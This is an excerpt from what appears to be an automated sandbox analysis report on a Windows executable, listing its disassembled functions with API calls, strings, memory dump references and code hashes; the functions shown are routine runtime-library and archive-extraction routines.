                  • _free.LIBCMT ref: 00F58090
                  • _free.LIBCMT ref: 00F580A3
                  • _free.LIBCMT ref: 00F580B4
                  • _free.LIBCMT ref: 00F580C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 7021daa15f431c411a2aa85726a3c6ae562b414c168dba10676937c32df342ed
                  • Instruction ID: 1a682c9972f5966e7014e9dfccbe7fa030473199d62045e86d9fcbfc6e81b623
                  • Opcode Fuzzy Hash: 7021daa15f431c411a2aa85726a3c6ae562b414c168dba10676937c32df342ed
                  • Instruction Fuzzy Hash: 01F03A7AC0212E8BC715BF15BC014053B65B7147A1309866BFD62A7A71DB35085ABFC1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F576BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hx1hwVZIjy.exe,00000104), ref: 00F576FD
                  • _free.LIBCMT ref: 00F577C8
                  • _free.LIBCMT ref: 00F577D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\hx1hwVZIjy.exe
                  • API String ID: 2506810119-241033897
                  • Opcode ID: 2ce0260f9211ad11ad31ff9332555b50a2f64a2cbed0717812faec5d00bba193
                  • Instruction ID: 6cf307ca8acba4a3a69f09e8f849f35288927591f890e7d1a381e40271ef3230
                  • Opcode Fuzzy Hash: 2ce0260f9211ad11ad31ff9332555b50a2f64a2cbed0717812faec5d00bba193
                  • Instruction Fuzzy Hash: BD319171E04309AFDB21EF99FC8199EBBFCEB89711F144066EE0497201D6744E49EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F37574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37579
                    • Part of subcall function 00F33B3D: __EH_prolog.LIBCMT ref: 00F33B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F37640
                    • Part of subcall function 00F37BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F37C04
                    • Part of subcall function 00F37BF5: GetLastError.KERNEL32 ref: 00F37C4A
                    • Part of subcall function 00F37BF5: CloseHandle.KERNEL32(?), ref: 00F37C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 3942005ee4461018392b03f486194005584d093639df308a7924f16e857236d0
                  • Instruction ID: d0630a23264ca816458ad89a40b4929b0c473e3edd655f0bbdbf034c2a20c72a
                  • Opcode Fuzzy Hash: 3942005ee4461018392b03f486194005584d093639df308a7924f16e857236d0
                  • Instruction Fuzzy Hash: 1C3190B1D08348AEDF20EB68DC12FEEBB69AF55364F044059F848A7252DB744A44EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F4A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F4A4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: ea2efed69d9080ece165256f1e35b08a9849702593e0cb994d12e67b8353f6a0
                  • Instruction ID: 3df4e9e44f96a15220397b4ed22008e5d70da62c5df173f4726369f94e547206
                  • Opcode Fuzzy Hash: ea2efed69d9080ece165256f1e35b08a9849702593e0cb994d12e67b8353f6a0
                  • Instruction Fuzzy Hash: 6311B232684214BFDA21DF68DD4DF6E3FA9EB4A760F100006FA419B0B1CBA59905F723
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: 029947fa5c9988db7fd30d3f2943e77dc83d4c686806bf798aa15962b841326c
                  • Instruction ID: 2f6a93936c8cbbc59e33e295e5f2edd5815e182c144f6b073d8bafa736e7b398
                  • Opcode Fuzzy Hash: 029947fa5c9988db7fd30d3f2943e77dc83d4c686806bf798aa15962b841326c
                  • Instruction Fuzzy Hash: 2D216372840208ABEF21DEA4DC46FEE7BA8AF05720F040512FE1596191D375DA59FB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F4A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F4AA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  • Opcode ID: 7625d8145139658674b68900aa04da511ebc4efd7750ea5e9b79cb08ca817c68
                  • Instruction ID: 96c6ece80a5c8ce1d5ce76b6f2a1cb63be4e2f0006c07e28b9fea1b99a4abfd0
                  • Opcode Fuzzy Hash: 7625d8145139658674b68900aa04da511ebc4efd7750ea5e9b79cb08ca817c68
                  • Instruction Fuzzy Hash: EF110433980118BADB219B649D49FFB3F6CEB49720F000022FE45B21D0C2699955F7A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 00F3B51E
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • _wcschr.LIBVCRUNTIME ref: 00F3B53C
                  • _wcschr.LIBVCRUNTIME ref: 00F3B54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  • Opcode ID: 1059544c9adac2b3d10e54c9bf818dcb359cda96ddd8dda12236581e8f766267
                  • Instruction ID: 6d5abcf24783c8131295bd08c4282fb9ae53a299cd7b6c28b8d0577e69f6e20b
                  • Opcode Fuzzy Hash: 1059544c9adac2b3d10e54c9bf818dcb359cda96ddd8dda12236581e8f766267
                  • Instruction Fuzzy Hash: 08014953904311BAC7206BB48C53D2BB7ACEE953B1F484406FB45C6085FB34E844E2A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F406BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F406F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F406FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F4070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00F40725
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  • Opcode ID: a49b898cadc82ff977b5ec4576324d87d89955cc44789e79d126617b0ae9fbdb
                  • Instruction ID: c27eaa91b1898bc38ad118e2c85bfbfe7632e9666460267652ae6eb571c01454
                  • Opcode Fuzzy Hash: a49b898cadc82ff977b5ec4576324d87d89955cc44789e79d126617b0ae9fbdb
                  • Instruction Fuzzy Hash: 7E11A0B1900709AFC3205F65CC84AA7FBECEF95764F10482EF2DA82200DAB16980EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  • Opcode ID: 1e942781a6e4ac8efd23421c817baf4a631c2ad3fb18d26f8c16852e41d9e009
                  • Instruction ID: 79ff99fd9febd18f6942408fba9284fa12b260d365ed84800b060ec14a741ddd
                  • Opcode Fuzzy Hash: 1e942781a6e4ac8efd23421c817baf4a631c2ad3fb18d26f8c16852e41d9e009
                  • Instruction Fuzzy Hash: 54017172A4024DAFCB51DF55ED48A6A3FA9EB05390B000421FD09D3271DAB19C90FBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F591DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                  • Instruction ID: 0c643c4761f51d2586c8f5737b69c94b97a6882b37bbbddb877adaa643d4d071
                  • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                  • Instruction Fuzzy Hash: 27A17B32D08346DFDB19CF58C8917AEBBE5EF51321F14816DEE859B281C2B88D4AD750
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00F380B7,?,?,?), ref: 00F3A351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00F380B7,?,?), ref: 00F3A395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00F380B7,?,?,?,?,?,?,?,?), ref: 00F3A416
                  • CloseHandle.KERNEL32(?,?,00000000,?,00F380B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3A41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  • Opcode ID: 79ac240a9194c2bf47b4f0a5b52acf0800ea6a6ef169ec05e204b81834214136
                  • Instruction ID: ab309b24fb669051a1205846b6124a0b9d582a51d6e5d8bd455a4c8181d79746
                  • Opcode Fuzzy Hash: 79ac240a9194c2bf47b4f0a5b52acf0800ea6a6ef169ec05e204b81834214136
                  • Instruction Fuzzy Hash: 2841CE31648384AAE731DF25DC45BABBBE4AF91720F04091CF5E0D31D1D6699A48AB53
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F589AD,?,00000000,?,00000001,?,?,00000001,00F589AD,?), ref: 00F5C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F5C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F567E2,?), ref: 00F5C181
                  • __freea.LIBCMT ref: 00F5C18A
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: bcfbc12e7eb27559e5d81df639b049aacc3f0d906e72830fc71788985fc269ad
                  • Instruction ID: 1f12a9341e67136e09ec90f7dbc039c7bbe67af8d67078bb966646b1f075a74a
                  • Opcode Fuzzy Hash: bcfbc12e7eb27559e5d81df639b049aacc3f0d906e72830fc71788985fc269ad
                  • Instruction Fuzzy Hash: B631DE72A0060AAFDB248F74CC81DAE7BA5EB40721F050128FD16D7251EB35CD59EBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F52503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00F5251A
                    • Part of subcall function 00F52B52: ___AdjustPointer.LIBCMT ref: 00F52B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00F52531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00F52543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00F52567
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction ID: e43acb7e593a289d05e3ecd9992e7dbf7ebd60d3284f3ec6c7660c9a87b48ce2
                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction Fuzzy Hash: 52014C32400109BBCF129F55CC41EDA3FBAFF5A751F058114FE1866121D336E965EBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00F49DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F49DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F49DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00F49DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: b18493b6bc7840978f531f212b1fe36c8fca2481e14bee686587362800251b6c
                  • Instruction ID: 814dd50321ea4b1d9ac7d8960cabd2e4c8cf0fea31416af64df388771c034b70
                  • Opcode Fuzzy Hash: b18493b6bc7840978f531f212b1fe36c8fca2481e14bee686587362800251b6c
                  • Instruction Fuzzy Hash: 61E0EC3198AA25B7D7A05BA6AC0DBCB3F64AB0A762F050006FA05961A0DAB14445EB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F52016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00F52016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00F5201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00F52020
                    • Part of subcall function 00F5310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00F5311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00F52035
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction ID: 9e9788554e0199264a02244bb51372287b484447b65921be38fc49213b682982
                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
